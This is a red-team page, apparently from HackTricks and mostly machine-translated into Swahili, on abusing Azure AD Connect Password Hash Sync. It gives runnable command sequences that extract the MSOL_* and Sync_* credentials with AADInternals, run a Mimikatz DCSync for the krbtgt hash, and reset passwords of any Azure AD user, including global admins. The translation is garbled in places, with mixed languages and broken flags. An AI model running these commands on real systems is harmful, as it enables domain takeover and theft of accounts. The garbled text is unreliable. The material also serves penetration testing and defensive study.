Az - PHS - Password Hash Sync

Reading time: 6 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

From the docs: Sawa na usawazishaji wa hash ya nywila ni moja ya mbinu za kuingia zinazotumika kufanikisha utambulisho wa hybrid. Azure AD Connect inasawazisha hash, ya hash, ya nywila ya mtumiaji kutoka kwa mfano wa Active Directory wa ndani hadi mfano wa Azure AD wa wingu.

Ni mbinu ya kawaida zaidi inayotumiwa na kampuni kusawazisha AD ya ndani na Azure AD.

Watumiaji wote na hash ya hash za nywila wanasawazishwa kutoka kwa AD ya ndani hadi Azure AD. Hata hivyo, nywila za maandiko wazi au hash za asili hazitumwi kwa Azure AD.
Zaidi ya hayo, vikundi vya usalama vilivyojengwa ndani (kama wasimamizi wa eneo...) havisawazishwi kwa Azure AD.

Usawazishaji wa hash unafanyika kila dakika 2. Hata hivyo, kwa kawaida, kuisha kwa nywila na kuisha kwa akaunti hakusawazishwi katika Azure AD. Hivyo, mtumiaji ambaye nywila yake ya ndani imeisha (haijabadilishwa) anaweza kuendelea kupata rasilimali za Azure akitumia nywila ya zamani.

Wakati mtumiaji wa ndani anapotaka kupata rasilimali ya Azure, uthibitishaji unafanyika kwenye Azure AD.

PHS inahitajika kwa vipengele kama Ulinzi wa Utambulisho na Huduma za Kikoa za AAD.

Pivoting

Wakati PHS imewekwa, baadhi ya akaunti zenye mamlaka zinaanzishwa kiotomatiki:

  • Akaunti MSOL_<installationID> inaanzishwa kiotomatiki katika AD ya ndani. Akaunti hii inapewa jukumu la Akaunti za Usawazishaji wa Katalogi (ona nyaraka) ambayo inamaanisha kwamba ina idhini za uzalishaji (DCSync) katika AD ya ndani.
  • Akaunti Sync_<name of on-prem ADConnect Server>_installationID inaanzishwa katika Azure AD. Akaunti hii inaweza kurekebisha nywila ya MTUMIAJI YOYOTE (iliyowekwa sawa au ya wingu pekee) katika Azure AD.

Nywila za akaunti hizo mbili zenye mamlaka zimehifadhiwa katika seva ya SQL kwenye seva ambapo Azure AD Connect imewekwa. Wasimamizi wanaweza kutoa nywila za watumiaji hao wenye mamlaka kwa maandiko wazi.
Hifadhidata iko katika C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf.

Inawezekana kutoa usanidi kutoka moja ya meza, ikiwa moja imefungwa:

SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;

Usanidi uliofungwa umefungwa kwa DPAPI na unajumuisha nywila za mtumiaji MSOL_* katika AD ya ndani na nywila ya Sync_* katika AzureAD. Hivyo, kuathiri hizi inawezekana kupandisha hadhi hadi AD na AzureAD.

Unaweza kupata muonekano kamili wa jinsi akreditivu hizi zinavyohifadhiwa na kufunguliwa katika mazungumzo haya.

Finding the Azure AD connect server

Ikiwa seva ambapo Azure AD connect imewekwa imeunganishwa na kikoa (iliyopendekezwa katika nyaraka), inawezekana kuipata kwa:

bash
# ActiveDirectory module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl

#Azure AD module
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

Kutumia MSOL_*

bash
# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
Get-AADIntSyncCredentials

# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'

caution

Unaweza pia kutumia adconnectdump kupata hizi sifa.

Kutumia Sync_*

Kuharibu akaunti ya Sync_* inawezekana kurekebisha nenosiri la mtumiaji yeyote (ikiwemo Wasimamizi wa Kimataifa)

bash
# This command, run previously, will give us alse the creds of this account
Get-AADIntSyncCredentials

# Get access token for Sync_* account
$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache

# Get global admins
Get-AADIntGlobalAdmins

# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId

# Reset the users password
Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose

# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)

Inawezekana pia kubadilisha nywila za watumiaji wa wingu pekee (hata kama hiyo siyo ya kutarajia)

bash
# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID

# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers

Ni possible pia kutoa nenosiri la mtumiaji huyu.

caution

Chaguo lingine lingekuwa kutoa ruhusa za kipaumbele kwa huduma ya msingi, ambayo mtumiaji wa Sync ana ruhusa ya kufanya, na kisha kufikia huduma hiyo ya msingi kama njia ya privesc.

Seamless SSO

Ni possible kutumia Seamless SSO na PHS, ambayo inahatarishwa na matumizi mengine. Angalia katika:

Az - Seamless SSO

References

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks